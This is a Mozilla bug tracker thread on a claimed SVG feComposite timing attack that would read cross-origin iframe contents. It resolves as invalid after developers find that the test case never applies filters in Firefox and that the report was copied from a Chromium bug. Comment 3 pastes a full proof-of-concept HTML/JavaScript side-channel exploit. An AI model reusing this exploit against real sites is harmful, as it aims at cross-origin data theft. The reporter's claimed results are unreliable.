1248315 - Security: Timing attack on SVG feComposite filter circumvents same-origin policy

Status: RESOLVED INVALID

(Core :: SVG, defect)

Description

[Khalil Zhani]

Attachment: exploit.html (note that the -webkit-filter styles here have zero effect in Firefox release builds)

Using the SVG feComposite filter may produce intermediate pixel color values outside of the normal 0-255 byte range, hence the intermediate values get clamped between the right values. However, the time required to perform clamping is not independent of the intermediate color value, because the number of comparison statements traversed is different. This allows an attacker to differentiate between values smaller than zero, and values in the range of 0-255. Because the filter can be applied to sources from other origins, such as iframes, this allows an attacker to read the contents of sources with a different origin.

An exploit is attached: exploit.html, it reads a character from example.com.

The exploit performs the computations of feComposite so many times that the difference becomes measurable by JavaScript, and thus an original image can be reconstructed. The timing is of course very noisy so the provided exploit doesn't reconstruct the image perfectly, however the exploit could of course be improved to produce a better image. My results show approximately 75% correct pixels which is significantly better than a random function of 50%.

Despite the exploit showing a very slow reconstruction of a single character, this is only a proof of concept. An actual exploit would be better because it could look at certain defining pixels instead of entire characters (or combinations of pixels acquired by applying filters). This way every pixel reconstructed leaks exactly 1 bit of information.

I performed the exploit a couple of times and the results and analysis are attached in the attached image results.png

Comment 1

[Khalil Zhani]

Attachment: results.png

Comment 2

[:Gijs (he/him)]

Do you know what webkit/blink do in this case?

Comment 3

[Khalil Zhani]

Comment on attachment 8719367 [details]
exploit.html (note that the -webkit-filter styles here have zero effect in Firefox release builds)

<html>
<head>
<script>
/*******************************************************************************
 * We perform a timing attack, differentiating on the time it takes to perform
 * svg composite arithmetic operations on differently colored pixels. For each
 * pixel we perform this computation many times, and then repeat the process
 * for the same pixel with inverted colors. Because computation on white pixels
 * takes longest, we know that the slowest computations were performed when the
 * pixel was white.
 * 
 * We call functions using setTimeout(function(){...}, 0); to ensure the browser
 * has time to do whatever it needs to do to not interrupt the javascript later.
 *
 * We have multiple factors increasing the number of times the computations are
 * done, this is to prevent the browser from intervening the computations. At
 * the lowest level we use the #switchAndSpread filter to increase the number of
 * pixels with the target color to apply the computations to.
 *
 * Furthermore, the attackRepeatedly() function increases the computation factor
 * by 31, and the measure() function increases it by measurementsMax (250)
 *
 * Increasing measurementsMax increases accuracy but also the time required.
 ******************************************************************************/
 
var measurementsTotal, lastMeasurements;
var measurementsCount = 0;
var measurementsMax = 250; //number of times to run measure() for each pixel
var output, output2;
//determines target to analyse.
//dimensions of reference frame are actually hardcoded in HTML.
var targetX, targetY, targetWidth, targetHeight;
var currentX, currentY;
//single line array with two positions per pixel. 1st is normal, 2nd inverted.
var measurements;
var reconstructionCanvas, reconstruction;
var switchedAnalysis = true; //initial state.

//initialize the exploit
function init() {
        output = document.getElementById("output");
        output2 = document.getElementById("output2");
        reconstructionCanvas = document.getElementById("reconstruction");
        setTarget(-151, -110, 7, 9); //example.com
        reconstructionCanvas.setAttribute("width", targetWidth);
        reconstructionCanvas.setAttribute("height", targetHeight);
        reconstruction = reconstructionCanvas.getContext("2d");
        measurements = new Array(targetWidth*targetHeight*2);
        for (var i = targetWidth*targetHeight*2-1; i>=0; --i) {
                measurements[i] = 0;
        }
        
        analyseTarget();
}

//basic building block of our measurements
//times a number of iterations where the differentation filter is applied
//i can't be too large, as noise will increase
//-moz-transform:rotateZ(0deg) and c.offsetHeight are in the loop to
//ensure style computation between timing events.
function attackRepeatedly() {
        var end, s, i, c;
        i = 31;
        c = document.getElementById("container");
        s = new Date();
        while(--i>=0) {
                c.setAttribute("style",
                 "-moz-filter:url(#differentiate);-moz-transform:rotateZ(0deg);");
                c.offsetHeight;
                c.setAttribute("style","");
                c.offsetHeight;
        }
        end = new Date();
        lastMeasurements = (end.getTime()-s.getTime());
}

//calls attackRepeatedly(), measurementsMax times.
//will update reconstruction and move to next pixel when done.
function measure() {
        if (measurementsCount == 0) {
                measurementsTotal = 0;
        }
        attackRepeatedly();
        measurementsTotal += lastMeasurements;
        if (++measurementsCount < measurementsMax) {
                setTimeout(function(){ measure(); }, 0);
        } else {
                measurementsCount = 0;
                updateMeasurements();
                setTimeout(function(){ analyseTarget(); }, 0);
        }
}

//updates the reconstruction with latest measurements
function updateMeasurements() {
        var index = (currentX + currentY*targetWidth)*2;
        measurements[index + (switchedAnalysis?1:0)] += measurementsTotal;
        if (switchedAnalysis) {
                reconstructTarget(currentX, currentY, (measurements[index] > measurements[index+1])?1:0);
        }
}

//supplies the pixels in correct order and form to the measure function
function analyseTarget() {
        switchedAnalysis = !switchedAnalysis;
        var inverter = document.getElementById("inverter");
        if (switchedAnalysis) { //case: last analysis wasn't switched, so now measure inverse
                inverter.setAttribute("class","inverted");
                setTimeout(function(){ measure(); }, 0);
        } else if (nextPixel()) { //case: last analysis was switched, so execute nextPixel()
                inverter.setAttribute("class","");
                setTimeout(function(){ measure(); }, 0);
        }
}

//draws a pixel on the reconstruction canvas
function reconstructTarget(x,y,white) {
        var color = ""+(Math.round(white*255)).toString(16);
        var colorTemplate = "00" + color;
    var formattedColor = colorTemplate.substr(colorTemplate.length-2);
        reconstruction.fillStyle = "#"+formattedColor+formattedColor+formattedColor;
        reconstruction.fillRect(x,y,1,1); 
}

//sets the target space
function setTarget(x, y, width, height) {
        targetX=x;
        targetY=y;
        targetWidth=width;
        targetHeight=height;
        currentX=-1;
        currentY=0;
        ref = document.getElementById("referenceFrame");
        ref.setAttribute("style","top: "+(targetY-2)+"px; left: "+(targetX-2)+"px;");
}

//runs over pixels in target
//returns true once the function has completed
function nextPixel() {
        if (++currentX >= targetWidth) {
                currentX = 0;
                ++currentY;
        }
        frame.setAttribute("style","top: "+(targetY-currentY-2)+"px; left: "+(targetX-currentX-2)+"px;");
        return (currentY < targetHeight);
}

</script>
<style>
#container {
        position: relative;
        width: 1000px;
        height: 1000px;
        opacity: 0.01;
        -moz-filter: url(#switchAndSpread);
}

.inverted {
        -moz-filter: url(#inverseBlackWhite);
}

.frame {
        position: absolute;
        width: 500px;
        height: 500px;
}
</style>
</head>
<body onload="init();"><!-- start the exploit once page has loaded -->

<!-- the svg containing the filters used for the attack -->
<svg style="position: absolute; height: 0; width: 0;">
<!-- differentiation between pixels by arithmetics, this filter gets timed -->
<filter id="differentiate">
 <feComposite in="SourceGraphic" in2="SourceGraphic"
  operator="arithmetic" k2="-0.5" k3="1"/>
</filter>

<!-- inverses the color-->
<filter id="inverseBlackWhite">
 <feColorMatrix type="matrix"
     values="-1 0 0 0 1
                         0 -1 0 0 1
                         0 0 -1 0 1
                         0 0 0  0 1 "/>
</filter>

<!-- switches black/white between 797979/7A7A7A
         black will be transparent, white opaque
     spreads out the pixel by tiling -->
<filter id="switchAndSpread">
 <feColorMatrix type="matrix"
     values="0.34 0.34 0.34 0 0.125
                         0.34 0.34 0.34 0 0.125
                         0.34 0.34 0.34 0 0.125
                         0.34 0.34 0.34 0 0.125" x="0" y="0" width="1" height="1"/>
 <feComponentTransfer>
    <feFuncR type="discrete" tableValues="0,1"/>
    <feFuncG type="discrete" tableValues="0,1"/>
    <feFuncB type="discrete" tableValues="0,1"/>
    <feFuncA type="discrete" tableValues="0,1"/>
 </feComponentTransfer>
<feTile x="0" y="0" width="1000" height="1000"/>
</filter>

<!-- morphs the pixels of the original picture to create a reference image
         so we can compare the reconstruction to what was analyzed-->
<filter id="referencePicture">
 <feColorMatrix type="matrix"
     values="0.34 0.34 0.34 0 0.125
                         0.34 0.34 0.34 0 0.125
                         0.34 0.34 0.34 0 0.125
                         0    0    0    0 1"/>
 <feComponentTransfer>
    <feFuncR type="discrete" tableValues="0,1"/>
    <feFuncG type="discrete" tableValues="0,1"/>
    <feFuncB type="discrete" tableValues="0,1"/>
 </feComponentTransfer>
</filter>
</svg>

<!-- just a bunch of containers containing the actual target -->
<div id="backgroundFrame" style="position: absolute; z-index:-1; width: 1000px; height: 1000px;">
                <div id="container" class="" style="">
                        <div id="inverter" class="" style="position: absolute; overflow: hidden; width:1px; height:1px; background-color:white;">
                                <iframe src="https://example.com/" style="top: 0px; left: 0px;" id="frame" class="frame"></iframe>
                        </div>
                </div>
</div>

<!-- the reconstruction and reference images -->
<div id="reconstructionDiv" style="">Reconstruction / Reference<br />
        <canvas id="reconstruction" style="border:1px solid #000000; background-color:#AAAAAA"></canvas>
        <span style="border: 1px solid #000000; position:absolute; overflow:hidden; background-color:white; width:7px; height:9px; -moz-filter: url(#referencePicture);">
                <iframe src="https://example.com/" class="frame" id="referenceFrame"></iframe>
        </span>
</div>
<div style="width:500px">Do not zoom the page while reconstruction is ongoing, this will result in improper reconstruction. The best way to compare images is to make a screenshot after the reconstruction is complete, and then zoom into the screenshot.</div>
<div id="output"></div>
</body>
</html>

Comment 4

[Khalil Zhani]

Oops sorry I uploaded the wrong testcase.

Comment 5

[Daniel Holbert [:dholbert]]

This sounds similar in spirit to bug 711043 (which was fixed a few years ago).

(Also, I'm tagging comment 3 as "typo" to make it autocollapse, since it's huge from having the contents of the testcase copypasted in as a comment.  People can still click the "+" to open it if they like -- or probably-better, they can just view its attached testcase [and its source] directly.)

Comment 6

[Daniel Holbert [:dholbert]]

I cannot reproduce locally, using Firefox Nightly or Firefox 43 (previous release) in an Ubuntu 14.04 VM. For me, the "reconstruction" snapshot always seems to be solid-gray.

Your screenshots are definitely concerning, though. What OS & Firefox version are you testing with?

Comment 7

[Daniel Holbert [:dholbert]]

(This might want a look from heycam, since he wrote the patch for bug 711043, and according to the attached screenshot, this seems to be getting around that patch's defenses.)

Comment 8

[Robert Longson [:longsonr]]

Doesn't work on my Mac either.

Comment 9

[Cameron McCormack (:heycam)]

I assume we're looking at the software backend here: https://dxr.mozilla.org/mozilla-central/rev/709f559b5406e8555cf84dd09bdc747b076f142c/gfx/2d/FilterProcessingSIMD-inl.h#1017.

Markus, as you rewrote the filter implementations since bug 711043, can you take a look?

Comment 10

[Daniel Holbert [:dholbert]]

(Transferring needinfo to mstange per comment 9)

Comment 11

[Khalil Zhani]

(In reply to Daniel Holbert [:dholbert] (offline 2/18-2/21) from comment #6)
> I cannot reproduce locally, using Firefox Nightly or Firefox 43 (previous
> release) in an Ubuntu 14.04 VM. For me, the "reconstruction" snapshot always
> seems to be solid-gray.
> 
> Your screenshots are definitely concerning, though. What OS & Firefox
> version are you testing with?

Firefox 44.0.2 on Windows 7

Comment 12

[:Gijs (he/him)]

I think the attached testcase uses -webkit-filter and the one in the collapsed comment 3 uses -moz-filter, and that's why the attached one doesn't work.

Comment 13

[Daniel Holbert [:dholbert]]

In Nightly at least, -webkit-filter should be supported as an alias for filter (and -moz-filter is rejected as invalid CSS).  So I'd expect the attached testcase to be more effective than comment 3, in Nightly.

Comment 14

[Markus Stange [:mstange]]

Nice work.
Khalil, can you paste the graphics section from your about:support?

The software filters were specifically written with this attack in mind. Since the attack works on your Windows 7 machine, which should use the Direct2D 1.1 backend for filters (GPU accelerated) assuming we're not blacklisting the driver, it sounds like the vulnerability is in Direct2D.

Comment 15

[Markus Stange [:mstange]]

In the software backend, the result from the convolve matrix operation is clamped to the 0-255 range using the functions ClampToNonZero(value) and umin(value, 255), which are defined as follows:

static int32_t
ClampToNonZero(int32_t a)
{
  return a * (a >= 0);
}

static inline unsigned
umin(unsigned a, unsigned b)
{
  return a - ((a - b) & -(a > b));
}

The hope was that these compile to fixed-time machine code, though I've never verified this. (And ClampToNonZero should probably be rewritten as "a & -(a > 0)".)

Comment 16

[Khalil Zhani]

I have attached a screenshot for graphics section.

Comment 17

[Khalil Zhani]

Attachment: screenshot.png

Comment 18

[Markus Stange [:mstange]]

Thanks. Your content backend is cairo, which means that your machine is using the software code.

Comment 15 can be ignored - I was describing the feConvolveMatrix filter, but your exploit uses the feComposite filter.

Comment 19

[Markus Stange [:mstange]]

After looking at the exploit more closely, I don't think it can work in this state at all. Did you make changes to it after you recorded the Firefox results?

Your attackRepeatedly function (which is the only place where you measure times) only times style resolution, not painting. Painting only happens during the time when no JS is executing (i.e. in the time during which you wait for the setTimeout to fire). So you if you want to time painting, you need to take the first timestamp just before you exit your JS, and the next timestamp when your timeout callback is called.
In fact, Firefox never paints the "differentiate" filter at all, since attackRepeatedly()  always unsets the "-webkit-filter:url(#differentiate)" style before it exits the function.

Comment 20

[Khalil Zhani]

Sorry for delay, we made this exploit for target Chrome and we get the same result.

Comment 21

[Khalil Zhani]

https://bugs.chromium.org/p/chromium/issues/detail?id=586820

Comment 22

[Daniel Holbert [:dholbert]]

(In reply to Khalil Zhani from comment #20)
> Sorry for delay, we made this exploit for target Chrome and we get the same
> result.

Could you make double-check that you've attached the correct testcase that definitely reproduces the issue for you in Firefox, and attach that testcase?   (Maybe you've already double-checked that; but given that nobody else here has been able to reproduce yet, and given that the file you attached has a bunch of -webkit stuff, seems worth checking.)

Comment 23

[Khalil Zhani]

Actually I couldn't repro it on Nightly, but I'm still able to reproduce it on 44.0.2 (stable).

Comment 24

[Khalil Zhani]

Attachment: result.png

Comment 25

[Daniel Holbert [:dholbert]]

(In reply to Daniel Holbert [:dholbert] from comment #6)
> For me, the "reconstruction" snapshot always seems to be solid-gray.

My bad -- I didn't leave the testcase open for long enough (before reloading) to populate the snapshot.

I can confirm that I do see black & white pixels (not gray) eventually populated in the "reconstruction" frame, if I leave the testcase open for a minute or so.

However, the pattern looks random & not at all related to the reference. I'm testing on Windows; about:support says that I've got a direct2d backend. I also tested with about:config pref "layers.acceleration.disabled" set to false, which gives me a cairo backend. I'm using Firefox 44.02.

In any case, I'll assume for the moment that you've got some hardware/configuration difference that makes this reproducible on your machine (discounting Markus's concerns in comment 19 for the moment).  It's great to hear that this isn't reproducible in Nightly -- what is your threshold for "reproducible" vs. "not reproducible", out of curiosity?

Comment 26

[Daniel Holbert [:dholbert]]

(And, just to confirm, your most recent "result.png" is meant to show that this is not-reproducible in Nightly, correct? I can't tell whether you're using Nightly or Release in that screenshot, but it certainly looks like the reconstruction has no relation to the reference there.)

Comment 27

[Khalil Zhani]

Yeah I used Release in that screenshot.

Comment 28

[Daniel Holbert [:dholbert]]

I'm confused. Are you saying the screenshot demonstrates the problem still happening, or not?

In comment 23, you said 44.0.2 (aka Release) still reproduces the problem. But that screenshot (attachment 8722655 [details]) does not look like it shows any correlation between the reconstruction & the reference.

Comment 29

[Khalil Zhani]

Yes, the screenshot demonstrates the problem still happening, that's what I meant.

Comment 30

[:Gijs (he/him)]

(In reply to Khalil Zhani from comment #29)
> Yes, the screenshot demonstrates the problem still happening, that's what I
> meant.

Why/how? There seems to be no correlation between the left and right image.

Comment 31

[Khalil Zhani]

AS in (In reply to :Gijs Kruitbosch from comment #30)
> (In reply to Khalil Zhani from comment #29)
> > Yes, the screenshot demonstrates the problem still happening, that's what I
> > meant.
> 
> Why/how? There seems to be no correlation between the left and right image.

But SVG feComposite filter should not produce intermediate pixel color values outside of the normal 0-255 byte range as in you can in (attachment 8722655 [details]).

Comment 32

[Markus Stange [:mstange]]

What intermediate stage are you referring to? How does the picture show that the color values are not clamped at the stage at which you think they should be clamped?

Comment 33

[Daniel Holbert [:dholbert]]

Note that the attached exploit uses "-webkit-filter" to apply the filter, which means the filter has zero effect in Firefox release (44.0.2).

So if your test is assuming the filter is applied, that is a faulty assumption (except in Nightlies for the past ~5 weeks, when bug 1236506 landed).  That might explain why your filtered output is outside the range that you expect...

Your copypasted testcase (as distinct from your attached testcase) used "-moz-filter", but we don't support that either, and we never have. We've only ever supported the unprefixed "filter" property itself.

So I think your testcase's dependence on prefixed filters (and its assumption that they do anything) might be the problem here. You may be getting random data, which you think is being generated by your filter, but it's actually not...

Comment 34

[Daniel Holbert [:dholbert]]

(In reply to Daniel Holbert [:dholbert] from comment #33)
> We've only ever supported the unprefixed "filter" property itself.

(and we've very recently started supporting "-webkit-filter" for compat reasons -- but in newer builds than the ones that you say are affected)

Comment 35

[Daniel Holbert [:dholbert]]

Attachment: exploit, modified to remove -webkit prefixes

For demonstration purposes -- here's the original exploit you attached, with "-webkit-filter" (which has no effect at all in Firefox 44) replaced with "filter" (which *does* actually do something).

(I'm letting this testcase populate its reconstruction locally, to see if it produces anything non-random-looking.)

Comment 36

[Daniel Holbert [:dholbert]]

Attachment: screenshot of Firefox Release (left) vs Nightly (right) after 20 minutes of viewing modified exploit.html

Here's what the reconstruction looks like in Release (44.02) & Nightly (47) after viewing comment 35's modified exploit for 20 minutes.

Release seems to have finished its reconstruction, and there's no clear correlation between the reconstruction and the reference.

Nightly seems to be much slower for some reason, and it may have just gotten stuck; I'm not sure.

In any case, it's not at all clear to me that there's anything actually leaking here, particularly given that the previously-provided testcases were using prefixed filter CSS that had literally no effect in supposedly-affected builds...

Comment 37

[Khalil Zhani]

(In reply to Markus Stange [:mstange] from comment #32)
> What intermediate stage are you referring to? How does the picture show that
> the color values are not clamped at the stage at which you think they should
> be clamped?

The color values should not be outside of the normal 0-255 byte range.

Comment 38

[Daniel Holbert [:dholbert]]

(Khalil, I'm curious on your responses to my Comment 33 - 37 -- in particular, in your trials where you believe you got results in Firefox 44, were you using a testcase that had a *vendor-prefixed* "filter" property, like the testcase you attached & the slightly-different testecase that you pasted into a comment here?

If so, it seems likely that any apparent successful results may have been statistical anomalies, particularly if you ran multiple trials & picked the best one.  Or alternately, if you really do somehow reliably get results with a testcase that uses prefixed filters, then it must not actually depend on filters at all, and the nature of this bug is different...)

Comment 39

[Daniel Holbert [:dholbert]]

Comment 0 also seems to be copypasted directly from the Chromium bug
 https://bugs.chromium.org/p/chromium/issues/detail?id=586820

...including this part:
> I performed the exploit a couple of times and the results
> and analysis are attached in the attached image results.png

And the results.png image that Khalil attached here is identical to the one on the Chromium bug. So, it's unclear to me whether that is a screenshot of Firefox's results, or Chromium's results.  (Given the webkit stuff in the testcase, I'm tending to think it's a screenshot of Chromium's results.)

Khalil, have you actually produced any concerning results in Firefox?  You mentioned a clamping issue, and I still don't understand how your testcase demonstrates that there's a clamping bug -- but more importantly, I don't see how it has any connection to a privacy/data-leakage issue, since you haven't shown any evidence of useful reconstructions in Firefox. (and we haven't been able to produce them on our end either, with your testcase & modified versions of your testcase)

Comment 40

[Khalil Zhani]

(In reply to Daniel Holbert [:dholbert] from comment #38)
> (Khalil, I'm curious on your responses to my Comment 33 - 37 -- in
> particular, in your trials where you believe you got results in Firefox 44,
> were you using a testcase that had a *vendor-prefixed* "filter" property,
> like the testcase you attached & the slightly-different testecase that you
> pasted into a comment here?
> 
> If so, it seems likely that any apparent successful results may have been
> statistical anomalies, particularly if you ran multiple trials & picked the
> best one.  Or alternately, if you really do somehow reliably get results
> with a testcase that uses prefixed filters, then it must not actually depend
> on filters at all, and the nature of this bug is different...)

Actually I used "-webkit-filter" property and I used also I used the testcase in (Comment 3), and I got the same result.

Comment 41

[Daniel Holbert [:dholbert]]

OK. As noted in comment 33, neither "-webkit-filter" nor "-moz-filter" (what you had in comment 3) have any effect in Firefox 44.  So it seems that your testing never actually exercised Firefox's filter code at all.

Can you clarify whether you actually got any data for Firefox that was concerning? All signs seem to point to "no" right now.

Comment 42

[Khalil Zhani]

(In reply to Daniel Holbert [:dholbert] from comment #41)
> OK. As noted in comment 33, neither "-webkit-filter" nor "-moz-filter" (what
> you had in comment 3) have any effect in Firefox 44.  So it seems that your
> testing never actually exercised Firefox's filter code at all.
> 
> Can you clarify whether you actually got any data for Firefox that was
> concerning? All signs seem to point to "no" right now.

Excuse me Daniel, what do you think about what I got and what you got in the screenshot ("Reconstruction")?

Comment 43

[Daniel Holbert [:dholbert]]

Maybe I'm misunderstanding, I don't see any correlation between the pixels in the reconstruction and the pixels in the reference image that it's trying to reconstruct.

Comment 44

[Daniel Holbert [:dholbert]]

(Your original screenshot here -- results.png -- is the only thing here that seems like compelling results, but I'm pretty sure that was taken using Chrome, as I noted in comment 39.)

Comment 45

[Daniel Holbert [:dholbert]]

Could you clarify what's concerning about the Firefox screenshots?

Comment 46

[Khalil Zhani]

I'm not sure if there is any correlation between the reconstruction & the reference. but I'm comfortable about what happens with the pixels in the reconstruction, I'm confused.

Comment 47

[Daniel Holbert [:dholbert]]

(In reply to Khalil Zhani from comment #46)
> but I'm comfortable about what happens with the pixels in the
> reconstruction, I'm confused.

I assume that here, you meant to say "But if you're comfortable..." (i.e. you're confused about why we're comfortable)

Explaining why I don't understand what's concerning here, since it seems to not clear yet: I admit that I haven't fully read grokked every step that your testcase is doing, but as far as I understand, it does:
 (1) set some filter styles, which *actually have no effect* in Firefox per comment 33
 (2) measure the time that takes to flush layout.
 (3) repeat that a bunch to produce a sum of a bunch of time measurements.
 (4) Somehow from those measurements, decide either to draw a white pixel or a black pixel into the "reconstruction".

And this produces a random assortment of white & black pixels.

I don't understand everything between (3) and (4), but I'm confused about what's significant/concerning here. Asking one more time: could you please

Comment 48

[Daniel Holbert [:dholbert]]

[hit save too early] ...could you please explain where the bug / privacy vulnerability is here?

Comment 49

[Khalil Zhani]

(In reply to Daniel Holbert [:dholbert] from comment #48)
> [hit save too early] ...could you please explain where the bug / privacy
> vulnerability is here?

The SVG filter can be applied to an iframe, and by looking at how long it takes to apply the filter a large number of times, you can learn information about the contents of the iframe, even if it is from another origin.

Comment 50

[Khalil Zhani]

And as you can in my screenshot.png (my result) since it's based on timing, the results it's a bit noisy, and vary from machine to machine.

Comment 51

[Daniel Holbert [:dholbert]]

(In reply to Khalil Zhani from comment #50)
> And as you can in my screenshot.png (my result) since it's based on timing,
> the results it's a bit noisy, and vary from machine to machine.

Noise is just noise....

Sorry, dude...did you actually read my questions/comments?

I understand that that "measure filter timing to figure out the contents of an iframe" is the *theoretical* attack... but:
 - as noted in comment 33, your testcases here don't even apply a filter that Firefox understands, so it's impossible that you're measuring any filtering operations.
 - Even if you *were* applying a filter correctly, comment 19 indicates that you're not actually measuring the result of the filtering operation.
 - Even if you were doing everything right, we've already mitigated this class of attack earlier in bug 711043 & and as described in comment 14 here, as far as we know -- so we'd need to see compelling proof (something like your original "result.png" attachment which seems to actually be a screenshot of Chrome taken from someone else's bug) to demonstrate that firefox is still vulnerable to this sort of attack.

So at this point, I don't really know what you've been hoping to achieve with this bug, but it seems like you didn't actually test Firefox and don't actually understand what the testcase is doing (which isn't too surprising given that it's taken from a Chromium bug that someone else filed).  I appreciate you trying to contribute to Firefox by reporting a bug, but please make sure you're not wasting people's time.

If I'm wrong about any of this, please correct me, but it seems this bug is INVALID, and 100% safe to open because the Chrome bug (& testcase) is already public and it seems like there's no Firefox bug here.

Comment 52

[Khalil Zhani]

Sorry Daniel. I didn't mean to wasting people's time, actually I was only trying to donate. I wasn't sure about if it hits Firefox. Sorry again and thanks for everything :)

Comment 53

[Daniel Holbert [:dholbert]]

OK. I do absolutely appreciate your intent to contribute, but keep in mind that we take security bugs very seriously, so it's counterproductive & wastes people's time if you copypaste a Chrome security bug into Mozilla's bug tracker (as you did here & in bug 1221681) without really knowing what's going on.

In the future, if you are concerned that Firefox is affected by a security bug from Chrome's bug tracker, do feel free to report it to us, BUT:

 (1) Please be *very clear* about when you're quoting someone else vs. when you're speaking for yourself. (Both in this bug and in bug 1221681, your initial comment included "I think..." or "I performed..." statements, which were actually statements from the original researcher -- not from you.  And it confused the issue a lot here -- e.g. we didn't realize your initial screenshot was bogus until 
comment 39.)

 (2) Please be clear, up-front, that you're simply re-reporting someone else's Chrome bug.  (Posting a link to the bug as an afterthought is a nice gesture, but it buries the attribution a bit.)

 (3) Please be clear about your confidence-level about whether Firefox is affected, and your level of understanding of the testcase.  (Your comment 0 here originally implied that both your confidence in Firefox being affected & your understanding of the testcase were strong, which was confusing and wasted time when we found reasons why the testcase shouldn't work in Firefox.)

 (4) Please make sure to answer questions clearly.

Thanks - I do hope you continue to contribute, but do keep the above guidelines in mind.